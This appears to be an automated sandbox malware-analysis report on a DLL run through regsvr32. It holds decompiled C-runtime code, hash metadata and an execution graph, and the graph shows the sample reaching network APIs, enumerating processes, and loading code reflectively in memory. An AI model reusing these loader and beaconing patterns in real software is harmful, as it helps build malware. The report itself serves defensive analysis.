                                                                                        				_t331 = __rax;
                                                                                        				_a1220 = 0x27;
                                                                                        				_a72 = 0x10;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                                                        				_a84 = 0x30;
                                                                                        				_a86 = _a1220 + 0x51;
                                                                                        				_a92 = 2;
                                                                                        				_a72 = 8;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                                                        				asm("bts eax, 0x9");
                                                                                        				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                                                        				E000007FE7FEF9D31EA0( &_a1560);
                                                                                        				_a1304 = _t331;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                                                        				E000007FE7FEF9D31EA0( &_a1560);
                                                                                        				_a1304 = _t331;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                                                        				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t332;
                                                                                        				goto 0xf9d3e807;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t332;
                                                                                        				goto 0xf9d3e844;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t332;
                                                                                        				goto 0xf9d3e844;
                                                                                        				E000007FE7FEF9D31E40( &_a1560);
                                                                                        				_a1304 = _t332;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                                                        				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                                                        				_a1312 =  ~_a1304;
                                                                                        				asm("bts eax, 0x8");
                                                                                        				goto 0xf9d3e88b;
                                                                                        				_t335 = _a1304;
                                                                                        				_a1312 = _t335;
                                                                                        				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                                                        				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                                                        				_a1312 = _a1312 & _t335;
                                                                                        				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                                                        				_a116 = 1;
                                                                                        				goto 0xf9d3e8ee;
                                                                                        				_a80 = _a80 & 0xfffffff7;
                                                                                        				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                                                        				_a116 = 0x200;
                                                                                        				if (_a1312 != 0) goto 0xf9d3e901;
                                                                                        				_a92 = 0;
                                                                                        				_a64 =  &_a687;
                                                                                        				_t213 = _a116;
                                                                                        				_a116 = _a116 - 1;
                                                                                        				if (_t213 > 0) goto 0xf9d3e92f;
                                                                                        				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                                                        				_a1480 = _a72;
                                                                                        				_a1296 = _t213 / _a1480 + 0x30;
                                                                                        				_a1488 = _a72;
                                                                                        				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                                                        				_t218 = _a1296 + _a1220;
                                                                                        				_a1296 = _t218;
                                                                                        				 *_a64 = _a1296 & 0x000000ff;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				goto 0xf9d3e90e;
                                                                                        				_a104 = _t218;
                                                                                        				_a64 = _a64 + 1;
                                                                                        				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                                                        				if (_a104 == 0) goto 0xf9d3ea0b;
                                                                                        				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				 *_a64 = 0x30;
                                                                                        				_a104 = _a104 + 1;
                                                                                        				if (_a108 != 0) goto 0xf9d3ec7c;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                                                        				_a84 = 0x2d;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                                                        				_a84 = 0x2b;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ea9d;
                                                                                        				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                                                        				_a84 = 0x20;
                                                                                        				_a92 = 1;
                                                                                        				_a1320 = _a88 - _a104 - _a92;
                                                                                        				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                                                        				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                        				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                        				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                                                        				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                                                        				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                        				if (_a76 != 0) goto 0xf9d3ec29;
                                                                                        				if (_a104 <= 0) goto 0xf9d3ec29;
                                                                                        				_t354 = _a64;
                                                                                        				_a1328 = _t354;
                                                                                        				_a1336 = _a104;
                                                                                        				_a1336 = _a1336 - 1;
                                                                                        				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                                                        				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                                                        				_a1496 = _t354;
                                                                                        				E000007FE7FEF9D26840(_t249,  &_a120);
                                                                                        				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                                                        				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                                                        				_a1200 = 0xffffffff;
                                                                                        				goto 0xf9d3ec27;
                                                                                        				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                        				_a1328 = _a1328 + _a1340;
                                                                                        				goto 0xf9d3eb61;
                                                                                        				goto 0xf9d3ec47;
                                                                                        				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                        				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                                                        				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                                                        				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                        				if (_a96 == 0) goto 0xf9d3ec9c;
                                                                                        				0xf9d25330();
                                                                                        				_a96 = 0;
                                                                                        				goto 0xf9d3da75;
                                                                                        				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                                                        				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                                                        				_a1504 = 0;
                                                                                        				goto 0xf9d3eccd;
                                                                                        				_a1504 = 1;
                                                                                        				_t257 = _a1504;
                                                                                        				_a1344 = _t257;
                                                                                        				if (_a1344 != 0) goto 0xf9d3ed13;
                                                                                        				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                        				_a32 = _t359;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x8f5;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t257 != 1) goto 0xf9d3ed13;
                                                                                        				asm("int3");
                                                                                        				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t359 = 0x16;
                                                                                        				_a32 = 0;
                                                                                        				r9d = 0x8f5;
                                                                                        				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        				_a1376 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				goto 0xf9d3ed8e;
                                                                                        				_a1380 = _a1200;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        			}













                                                                                        0x7fef9d3e70c
                                                                                        0x7fef9d3e70c
                                                                                        0x7fef9d3e717
                                                                                        0x7fef9d3e72a
                                                                                        0x7fef9d3e731
                                                                                        0x7fef9d3e740
                                                                                        0x7fef9d3e745
                                                                                        0x7fef9d3e74f
                                                                                        0x7fef9d3e762
                                                                                        0x7fef9d3e768
                                                                                        0x7fef9d3e77b
                                                                                        0x7fef9d3e785
                                                                                        0x7fef9d3e78a
                                                                                        0x7fef9d3e792
                                                                                        0x7fef9d3e7a2
                                                                                        0x7fef9d3e7ac
                                                                                        0x7fef9d3e7b1
                                                                                        0x7fef9d3e7b9
                                                                                        0x7fef9d3e7c7
                                                                                        0x7fef9d3e7d2
                                                                                        0x7fef9d3e7e1
                                                                                        0x7fef9d3e7e5
                                                                                        0x7fef9d3e7ed
                                                                                        0x7fef9d3e7f7
                                                                                        0x7fef9d3e7ff
                                                                                        0x7fef9d3e807
                                                                                        0x7fef9d3e812
                                                                                        0x7fef9d3e81c
                                                                                        0x7fef9d3e823
                                                                                        0x7fef9d3e82b
                                                                                        0x7fef9d3e835
                                                                                        0x7fef9d3e83c
                                                                                        0x7fef9d3e84d
                                                                                        0x7fef9d3e858
                                                                                        0x7fef9d3e865
                                                                                        0x7fef9d3e871
                                                                                        0x7fef9d3e879
                                                                                        0x7fef9d3e87b
                                                                                        0x7fef9d3e883
                                                                                        0x7fef9d3e896
                                                                                        0x7fef9d3e8a3
                                                                                        0x7fef9d3e8b8
                                                                                        0x7fef9d3e8c5
                                                                                        0x7fef9d3e8c7
                                                                                        0x7fef9d3e8cf
                                                                                        0x7fef9d3e8d8
                                                                                        0x7fef9d3e8e4
                                                                                        0x7fef9d3e8e6
                                                                                        0x7fef9d3e8f7
                                                                                        0x7fef9d3e8f9
                                                                                        0x7fef9d3e909
                                                                                        0x7fef9d3e90e
                                                                                        0x7fef9d3e918
                                                                                        0x7fef9d3e91e
                                                                                        0x7fef9d3e929
                                                                                        0x7fef9d3e934
                                                                                        0x7fef9d3e957
                                                                                        0x7fef9d3e963
                                                                                        0x7fef9d3e990
                                                                                        0x7fef9d3e9a2
                                                                                        0x7fef9d3e9a4
                                                                                        0x7fef9d3e9b8
                                                                                        0x7fef9d3e9c2
                                                                                        0x7fef9d3e9c7
                                                                                        0x7fef9d3e9d9
                                                                                        0x7fef9d3e9e5
                                                                                        0x7fef9d3e9f5
                                                                                        0x7fef9d3e9fc
                                                                                        0x7fef9d3ea09
                                                                                        0x7fef9d3ea13
                                                                                        0x7fef9d3ea1d
                                                                                        0x7fef9d3ea26
                                                                                        0x7fef9d3ea2f
                                                                                        0x7fef9d3ea3e
                                                                                        0x7fef9d3ea4b
                                                                                        0x7fef9d3ea52
                                                                                        0x7fef9d3ea57
                                                                                        0x7fef9d3ea5f
                                                                                        0x7fef9d3ea6a
                                                                                        0x7fef9d3ea71
                                                                                        0x7fef9d3ea76
                                                                                        0x7fef9d3ea7e
                                                                                        0x7fef9d3ea89
                                                                                        0x7fef9d3ea90
                                                                                        0x7fef9d3ea95
                                                                                        0x7fef9d3eaad
                                                                                        0x7fef9d3eabd
                                                                                        0x7fef9d3eada
                                                                                        0x7fef9d3eaf8
                                                                                        0x7fef9d3eb06
                                                                                        0x7fef9d3eb11
                                                                                        0x7fef9d3eb2e
                                                                                        0x7fef9d3eb38
                                                                                        0x7fef9d3eb43
                                                                                        0x7fef9d3eb49
                                                                                        0x7fef9d3eb4e
                                                                                        0x7fef9d3eb5a
                                                                                        0x7fef9d3eb71
                                                                                        0x7fef9d3eb7a
                                                                                        0x7fef9d3eb85
                                                                                        0x7fef9d3eb8a
                                                                                        0x7fef9d3eb97
                                                                                        0x7fef9d3ebc9
                                                                                        0x7fef9d3ebd8
                                                                                        0x7fef9d3ebda
                                                                                        0x7fef9d3ebe5
                                                                                        0x7fef9d3ebff
                                                                                        0x7fef9d3ec1a
                                                                                        0x7fef9d3ec22
                                                                                        0x7fef9d3ec27
                                                                                        0x7fef9d3ec42
                                                                                        0x7fef9d3ec4f
                                                                                        0x7fef9d3ec5a
                                                                                        0x7fef9d3ec77
                                                                                        0x7fef9d3ec82
                                                                                        0x7fef9d3ec8e
                                                                                        0x7fef9d3ec93
                                                                                        0x7fef9d3ec9c
                                                                                        0x7fef9d3eca9
                                                                                        0x7fef9d3ecb3
                                                                                        0x7fef9d3ecb5
                                                                                        0x7fef9d3ecc0
                                                                                        0x7fef9d3ecc2
                                                                                        0x7fef9d3eccd
                                                                                        0x7fef9d3ecd4
                                                                                        0x7fef9d3ece3
                                                                                        0x7fef9d3ece5
                                                                                        0x7fef9d3ecec
                                                                                        0x7fef9d3ecf1
                                                                                        0x7fef9d3ecf4
                                                                                        0x7fef9d3ed06
                                                                                        0x7fef9d3ed0e
                                                                                        0x7fef9d3ed10
                                                                                        0x7fef9d3ed1b
                                                                                        0x7fef9d3ed1d
                                                                                        0x7fef9d3ed22
                                                                                        0x7fef9d3ed28
                                                                                        0x7fef9d3ed31
                                                                                        0x7fef9d3ed4c
                                                                                        0x7fef9d3ed51
                                                                                        0x7fef9d3ed61
                                                                                        0x7fef9d3ed6d
                                                                                        0x7fef9d3ed76
                                                                                        0x7fef9d3ed82
                                                                                        0x7fef9d3eda5

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: '$9
                                                                                        • API String ID: 1967237116-1823400153
                                                                                        • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                        • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                                                                        • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                        • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _unlock
                                                                                        • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                                                        • API String ID: 2480363372-1749241151
                                                                                        • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                        • Instruction ID: 04ee9255729ef7e149dbf43242f730f4bbed3ff16cc2c5ac2558ad9c7efde415
                                                                                        • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                        • Instruction Fuzzy Hash: BC113D7AA2868686EBE49B94DC41B6D63E1F780755F205035E68E43BA4CB3DE404CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                                                        • String ID: csm
                                                                                        • API String ID: 1826589669-1018135373
                                                                                        • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                        • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                                                                        • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                        • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free_nolock
                                                                                        • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                                                        • API String ID: 2882679554-3458198949
                                                                                        • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                        • Instruction ID: d33f1896f8d52307a9012ea76dc3fce74adc3acb1f5112dbea688671cc213a85
                                                                                        • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                                                        • Instruction Fuzzy Hash: 3B01F431A1C78286EBD09B6AE88576EB3D4F390350F614535E6CD43FA9DBBED4058B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:16.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:4%
                                                                                        Total number of Nodes:99
                                                                                        Total number of Limit Nodes:14
                                                                                        execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 18002975c 4068->4071 4075 180015774 4068->4075 4079 1800078a4 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800297af 4071->4073 4074 180029f99 4073->4074 4095 18000c758 4073->4095 4074->4068 4077 1800157bd 4075->4077 4078 1800157fb 4077->4078 4111 1800027f8 4077->4111 4078->4068 4082 1800078c0 4079->4082 4081 1800079e2 4081->4068 4082->4081 4118 18001705c 4082->4118 4086 180007ee1 4083->4086 4085 180008118 4085->4068 4086->4085 4129 180011ef8 4086->4129 4092 1800166ac 4087->4092 4091 180016ad3 4091->4068 4092->4091 4132 180023624 4092->4132 4136 180018bdc 4092->4136 4140 18000bc98 4092->4140 4144 18001aec8 4092->4144 4148 1800270c0 4092->4148 4101 18000c7dc 4095->4101 4096 18000c9b5 4102 18002446c 4096->4102 4097 18000c84b 4097->4073 4101->4096 4101->4097 4105 1800149cc 4101->4105 4108 180016500 4101->4108 4103 1800244af 4102->4103 4104 180024558 InternetOpenW 4103->4104 4104->4097 4107 180014a4c 4105->4107 4106 180014ae5 HttpOpenRequestW 4106->4101 4107->4106 4110 18001657b 4108->4110 4109 18001663c InternetConnectW 4109->4101 4110->4109 4114 180006f2c 4111->4114 4113 18000289c 4113->4077 4115 180006f5d 4114->4115 4116 180007250 Process32NextW 4115->4116 4117 180006fbc 4115->4117 4116->4115 4117->4113 4120 18001707b 4118->4120 4121 1800172eb 4120->4121 4122 180028348 4120->4122 4121->4082 4123 180028431 4122->4123 4124 180028607 4123->4124 4126 180017bf8 4123->4126 4124->4120 4128 180017c7c 4126->4128 4127 180017d21 GetVolumeInformationW 4127->4124 4128->4127 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4085 4131->4130 4134 180023662 4132->4134 4133 180023683 4133->4092 4134->4133 4152 180018628 4134->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4092 4142 18000bcde 4140->4142 4141 18000c521 4141->4092 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4146 18001aef6 4144->4146 4145 180011ef8 CreateThread 4145->4146 4146->4145 4147 18001b239 4146->4147 4147->4092 4150 180027157 4148->4150 4149 180027fe1 4149->4092 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4134 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 130000 4160 130183 4159->4160 4161 13043e VirtualAlloc 4160->4161 4164 130462 4161->4164 4162 130531 GetNativeSystemInfo 4163 13056d VirtualAlloc 4162->4163 4165 130a00 4162->4165 4167 13058b 4163->4167 4164->4162 4164->4165 4166 1309d9 VirtualProtect 4166->4167 4167->4165 4167->4166 4167->4167 4168 180011ef8 4170 180011f57 4168->4170 4169 180012017 CreateThread 4170->4169 4171 180018628 4172 180018660 4171->4172 4173 18001bf0c CreateFileW 4172->4173 4174 180018943 4172->4174 4173->4172 4175 18000c819 4179 18000c80c 4175->4179 4176 18000c9b5 4177 18002446c InternetOpenW 4176->4177 4180 18000c84b 4177->4180 4178 1800149cc HttpOpenRequestW 4178->4179 4179->4175 4179->4176 4179->4178 4179->4180 4181 180016500 InternetConnectW 4179->4181 4181->4179

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 130000-130460 call 130aa8 * 2 VirtualAlloc 22 130462-130466 0->22 23 13048a-130494 0->23 24 130468-130488 22->24 26 130a91-130aa6 23->26 27 13049a-13049e 23->27 24->23 24->24 27->26 28 1304a4-1304a8 27->28 28->26 29 1304ae-1304b2 28->29 29->26 30 1304b8-1304bf 29->30 30->26 31 1304c5-1304d2 30->31 31->26 32 1304d8-1304e1 31->32 32->26 33 1304e7-1304f4 32->33 33->26 34 1304fa-130507 33->34 35 130531-130567 GetNativeSystemInfo 34->35 36 130509-130511 34->36 35->26 38 13056d-130589 VirtualAlloc 35->38 37 130513-130518 36->37 39 130521 37->39 40 13051a-13051f 37->40 41 1305a0-1305ac 38->41 42 13058b-13059e 38->42 43 130523-13052f 39->43 40->43 44 1305af-1305b2 41->44 42->41 43->35 43->37 46 1305c1-1305db 44->46 47 1305b4-1305bf 44->47 48 13061b-130622 46->48 49 1305dd-1305e2 46->49 47->44 51 1306db-1306e2 48->51 52 130628-13062f 48->52 50 1305e4-1305ea 49->50 53 13060b-130619 50->53 54 1305ec-130609 50->54 56 130864-13086b 51->56 57 1306e8-1306f9 51->57 52->51 55 130635-130642 52->55 53->48 53->50 54->53 54->54 55->51 60 130648-13064f 55->60 58 130871-13087f 56->58 59 130917-130929 56->59 61 130702-130705 57->61 64 13090e-130911 58->64 62 130a07-130a1a 59->62 63 13092f-130937 59->63 65 130654-130658 60->65 66 130707-13070a 61->66 67 1306fb-1306ff 61->67 90 130a40-130a4a 62->90 91 130a1c-130a27 62->91 69 13093b-13093f 63->69 64->59 68 130884-1308a9 64->68 70 1306c0-1306ca 65->70 71 130788-13078e 66->71 72 13070c-13071d 66->72 67->61 95 130907-13090c 68->95 96 1308ab-1308b1 68->96 76 130945-13095a 69->76 77 1309ec-1309fa 69->77 74 13065a-130669 70->74 75 1306cc-1306d2 70->75 73 130794-1307a2 71->73 72->73 78 13071f-130720 72->78 80 1307a8 73->80 81 13085d-13085e 73->81 86 13066b-130678 74->86 87 13067a-13067e 74->87 75->65 82 1306d4-1306d5 75->82 84 13097b-13097d 76->84 85 13095c-13095e 76->85 77->69 88 130a00-130a01 77->88 89 130722-130784 78->89 92 1307ae-1307d4 80->92 81->56 82->51 100 1309a2-1309a4 84->100 101 13097f-130981 84->101 97 130960-13096c 85->97 98 13096e-130979 85->98 99 1306bd-1306be 86->99 102 130680-13068a 87->102 103 13068c-130690 87->103 88->62 89->89 104 130786 89->104 93 130a7b-130a8e 90->93 94 130a4c-130a54 90->94 105 130a38-130a3e 91->105 127 1307d6-1307d9 92->127 128 130835-130839 92->128 93->26 94->93 107 130a56-130a78 94->107 95->64 116 1308b3-1308b9 96->116 117 1308bb-1308c8 96->117 108 1309be-1309bf 97->108 98->108 99->70 114 1309a6-1309aa 100->114 115 1309ac-1309bb 100->115 109 130983-130987 101->109 110 130989-13098b 101->110 111 1306b6-1306ba 102->111 112 130692-1306a3 103->112 113 1306a5-1306a9 103->113 104->73 105->90 106 130a29-130a35 105->106 106->105 107->93 122 1309c5-1309cb 108->122 109->108 110->100 120 13098d-13098f 110->120 111->99 112->111 113->99 121 1306ab-1306b3 113->121 114->108 115->108 123 1308ea-1308fe 116->123 124 1308d3-1308e5 117->124 125 1308ca-1308d1 117->125 129 130991-130997 120->129 130 130999-1309a0 120->130 121->111 131 1309d9-1309e9 VirtualProtect 122->131 132 1309cd-1309d3 122->132 123->95 138 130900-130905 123->138 124->123 125->124 125->125 134 1307e3-1307f0 127->134 135 1307db-1307e1 127->135 136 130844-130850 128->136 137 13083b 128->137 129->108 130->122 131->77 132->131 140 1307f2-1307f9 134->140 141 1307fb-13080d 134->141 139 130812-13082c 135->139 136->92 142 130856-130857 136->142 137->136 138->96 139->128 144 13082e-130833 139->144 140->140 140->141 141->139 142->81 144->127
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1346163390.0000000000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 00130000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_130000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                        • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                        • API String ID: 2313188843-2517549848
                                                                                        • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                        • Instruction ID: c3ad375b28d4005cd65bc3de3fd702d44b77b28fe8b76393b77b528eb6f720f0
                                                                                        • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                        • Instruction Fuzzy Hash: CF72D470618B488FDB2ADF18C8956B9B7E1FB98305F10462DE8CAD7211DB34D986CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
